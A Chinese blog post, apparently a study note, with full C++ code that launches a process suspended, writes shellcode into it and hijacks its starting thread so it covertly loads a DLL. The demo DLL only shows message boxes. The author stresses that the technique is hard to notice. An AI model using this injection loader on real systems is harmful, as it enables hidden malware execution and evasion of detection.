EXE1调用EXE2来加载DLL实现隐藏功能

最新推荐文章于 2023-07-31 21:36:08 发布
最新推荐文章于 2023-07-31 21:36:08 发布
阅读量592 收藏
点赞数
分类专栏: c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcc1414/article/details/19936147
版权

这种方法不易察觉,其实还能做出很多其他的类型,这里只是学习··································

Context.Eip = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
改为
Context.Eax = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
线程在ring3的第一行代码时,Eax存放的是线程函数起始地址
这个应该更稳妥的,主线程暂停在ntdll空间,由ntdll->EXE入口点 中间还干了事,
学习于   http://bbs.pediy.com/showthread.php?t=159536
自己修改了下结构········································


主CPP   ExeOfShellcodeDllInject  代码:

#include "stdafx.h"
#include <Windows.h>

typedef struct tempData 
{
	char szInjectDllPath[MAX_PATH];
	char szShllcode[MAX_PATH]; 
};

char ShellCode[] = {0x60,0x68,0x78,0x56,0x34,0x12,0xB8,0x78,0x56,0x34,0x12,0xFF,0xD0,0x61,0xE9,0x78,0x56,0x34,0x12};
//pushad
//push 0x12345678
//mov eax,0x12345678
//call eax
//popad
//jmp 0xXXXXXXXX

struct tempData  g_data = {0x0};
int _tmain(int argc, _TCHAR* argv[])
{
	//初始化结构体中的两个结构 DLL路径+shellcode
	 strcpy(g_data.szInjectDllPath,"shellcodeDLLInject.dll");
	 strcpy(g_data.szShllcode,ShellCode);
	
	char szExePath[] = "OrdinaryMsg.exe";
	//PathRemoveFileSpec(szExePath);
	STARTUPINFO si = {sizeof(si)};
	PROCESS_INFORMATION pi = {0};
	CONTEXT context;
	//生成暂停EXE去做事情
	if (!CreateProcess(szExePath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi))
	{
		printf("找不到exe\n");
		return 0;
	}
	//设置 CONTEXT_INTEGER 才能得到寄存器值
	context.ContextFlags = CONTEXT_INTEGER;

	GetThreadContext(pi.hThread,&context);

	

	LPVOID lpData = VirtualAllocEx(pi.hProcess,NULL,sizeof(g_data)+1,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
	if (lpData == NULL)
	{
		printf("申请内存失败!\n");
		return 0;
	}

	*(DWORD*)(g_data.szShllcode+0x2) = (DWORD)lpData;
	*(DWORD*)(g_data.szShllcode + 0x7) = (DWORD)LoadLibraryA;
	*(DWORD*)(g_data.szShllcode + 15) = (DWORD)(context.Eax - (DWORD)((char*)lpData + sizeof(MAX_PATH)+ 14) -5 );
	//这里面的14为  g_data.szShllcode 起始到最后一个需要修改处的长度

	
	if (!WriteProcessMemory(pi.hProcess,lpData,&g_data,sizeof(g_data),NULL))
	{
		printf("写入内存失败!\n");
		return 0;
	}
	context.Eax = (DWORD)(((tempData*)lpData)->szShllcode);
	ResumeThread(pi.hThread);
		
	return 0;
}


将    OrdinaryMsg.exe    shellcodeDLLInject.dll   和主EXE放在同一目录下可以运行成功
 OrdinaryMsg.exe 代码: 

#include "stdafx.h"
#include <Windows.h>

#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )  

int main(int argc, _TCHAR* argv[])
{
	//FreeConsole();
	MessageBox(NULL,"OrdinaryMsg","OrdinaryMsg",MB_OK);
	//AllocConsole();
	return 0;
}
shellcodeDLLInject.dll  代码: 

#include "stdafx.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		DisableThreadLibraryCalls(hModule);
		MessageBox(NULL,TEXT("DLL中非法操作"),TEXT("DLL中非法操作"),MB_OK);
		break;
	case DLL_PROCESS_DETACH:
		MessageBox(NULL,TEXT("DLL中非法操作完毕"),TEXT("DLL中非法操作完毕"),MB_OK);
		break;
	}
	return TRUE;
}

最后效果为;













pandamac
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
合并 DLLEXE资源文件调用
05-14
这可以通过将DLL作为资源类型添EXE项目中来实现。在Visual Studio等IDE中,可以右键点击项目,选择“添资源”,然后选择“导入”将DLL文件添为二进制资源。这样,DLL的数据就会被编译到EXE文件中。 接下来...
EXE文件转化为DLL文件
weixin_42492218的博客
07-05 3101
将属性中的生成改为dll生成完成!
js nexe 使用_Nexe是一个命令行工具可将Node.js程序编译为单个可执行文件
weixin_42395002的博客
01-13 2212
npm i nexe -gNexe is a command-line utility that compiles your Node.js application into a single executable file.Motivation and FeaturesSelf contained applicationsAbility to run multiple applicatio...
node打包pkg和nexe比较
最新发布
latinhui的博客
07-31 2429
最近基于node写了一些小工具,自己用的时候就直接在node环境下运行了,结果圈外的朋友看了也想要,但是给他安装环境和叫她用命令行太过麻烦,就想着还是直接打包成exe文件吧。于是就对比了一下pkg和nexe两种主流的打包工具。
vs2012 如何把exedll
bruce135lee的专栏
04-21 3322
如果只是为了里面的函数可以被其他的程序使用的话,你不需要做任何动作,直接把xxx.exe重名名为xxx.dll就好。然后其他程序可以loadlibrary入这个dll,再getprocaddr获取指定的函数地址就可以调用了...
bartender 10.0 C#动态调用DLL
05-09
1. **DLL**:在C#中,我们可以使用`Assembly.LoadFrom()`或`Assembly.LoadFile()`方法BarTender的DLL文件。例如: ```csharp Assembly barTenderAssembly = Assembly.LoadFrom("path_to_dll\\Seagull....
内存exe的两种方式(支持win7)
11-24
DLL注入是内存EXE的一种常见方法,它通过将一个动态链接库(DLL)注入到另一个正在运行的进程的地址空间中来实现。在Windows系统中,这通常通过调用`CreateRemoteThread` API函数来完成。首先,你需要创建一个...
exe跟踪工具,查看exe调用dll
12-11
2. 分析依赖:文件后,depends会列出所有被调用dll,并显示出它们的版本信息、导出函数等。这有助于发现潜在的缺失dll问题,以及检查程序对特定版本dll的依赖性。 3. 查看函数调用:在dll列表中,点击任意一...
Dll中封装Exe并运行Exe
08-26
6. **调用DLL**:在主应用程序中,调用DLL的导出函数,这样就可以在DLL的上下文中运行`notepad.exe`了。 需要注意的是,这种方法可能涉及到版权问题,因为不是所有软件都可以被如此封装和执行。此外,由于`...
隐藏注入的dll
08-12
隐藏注入进程的dll,让我们的模块来无影去无踪
nexe:of从node.js应用程序中创建一个可执行文件
02-01
npm i nexe -g Nexe是一个命令行实用程序,它将您的Node.js应用程序编译为单个可执行文件。 动机和特点 自包含的应用程序 能够使用不同的node.js运行时运行多个应用程序。 分发二进制文件而无需节点/ npm。 等幂构建 快速启动和部署。 锁定特定的应用程序版本,并轻松回滚。 灵活的构建流程 跨平台构建 用法 应用程序入口点: nexe my-app.js stdin接口 rollup -c | nexe --resource "./public/**/*" -o my-app.exe 有关更多CLI选项,请参见: nexe --help 例子 nexe server.js -r "public/**/*.html" nexe --build nexe -t x86-8.0.0 资源资源 可以通过传递-r "glob/pattern/**/*"将其他文件或资源添到二进制文件中。 可以使用fs.readFile或fs.readFileSync在应用程序中读取这些包含的文件。 编译节点 默认情况下, nexe将尝试下预构建的可执行文件。 这些列
Windows DLL基本原理
helloworld201456的专栏
06-09 4386
Windows DLL基本原理 Windows系统平台上,你可以将独立的程序模块创建为较小的DLL(Dynamic Linkable Library)文件,并可对它们单独编译和测试。在运行时,只有当EXE程序确实要调用这些DLL模块的情况下,系统才会将它们装到内存空间中。这种方式不仅减少了EXE文件的大小和对内存空间的需求,而且使这些DLL模块可以同时被多个应用程序使用。Microsoft
qt生成的exe到指定路径DLL文件
sxtdzj的博客
05-09 4537
        qt编译生成的exe程序在打包依赖文件后,如果同时又有其他dll文件时,目录会看起来非常杂乱。我们可以通过将依赖文件放到某个路径下,让exe程序在指定路径下,此时需要用到qt 的qt.conf文件来处理。        qt.conf是一个配置文件,使用它可以让程序重新指定路径。在程序中使用QLibraryInfo类调用qt.conf文件,包含三
反编译工具Depends---dllexe反编译工具
热门推荐
私_有_云
11-21 1万+
反编译工具Depends 推荐使用比较不错的Depends.exe,分析dllexe所依赖的dll。可以看到dll以及dll的函数,可以查看导入导出函数,挺好用的。VC++ Depends用来显示与一个可执行文件(exe或者dll)相关的依赖项(dll),以及该exedll引用了这些dll中的哪些接口。 Depends Wallker是一个VC反编译工具,可以查看PE模块的导入模块以及导
exedll文件打包成单一的启动文件(两种方法)
Wc&Yd博客
11-29 1万+
exedll文件打包成单一的启动文件 当我们用 VS 或其它编程工具生成了可执行exe要运行它必须要保证其目录下有一大堆dll库文件,看起来很不爽,用专业的安装程序生成软件又显得繁琐,下面这个方法教你如何快速把exe文件和dll文件打包成一个可执行文件,就像我们平时看到的单一绿色软件一样,只要双击它,就能运行你的程序,简单,方便,而且只需用最常见的winrarr即可完成 1.电脑上安装winr...
例说Exe程序作为DLL进行
07-31 2563
 作 者: nbw时 间: 2008-07-17,23:05链 接: http://bbs.pediy.com/showthread.php?t=68730例说Exe程序作为DLL进行调用第三方exe程序里面的函数,一直是大家所向往并已经讨论过不少的问题,其方法大体有三类:1、让第三方exe启动,然后自己程序注入进去调用之;2、让第三方exe启动,然后远程读入其内容;3、把第三方exe,当作D
EXEDLL(两个默认堆问题)
Think && Discover && Share
06-09 2537
exe链接到静态C库,DLL连接到动态C库时,就会产生两个默认堆。此时在一个模块里面new,在另外一个模块里面delete,就会出现问题
深入解析:Windows下exe可执行文件的运行机制
"本文主要探讨了Windows环境下exe可执行文件的运行原理,涵盖了从程序的初始化、主函数的运行过程到程序收尾工作的整个生命周期。文章适合对Windows操作系统和Windows编程有一定了解的读者,旨在以通俗易懂的方式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值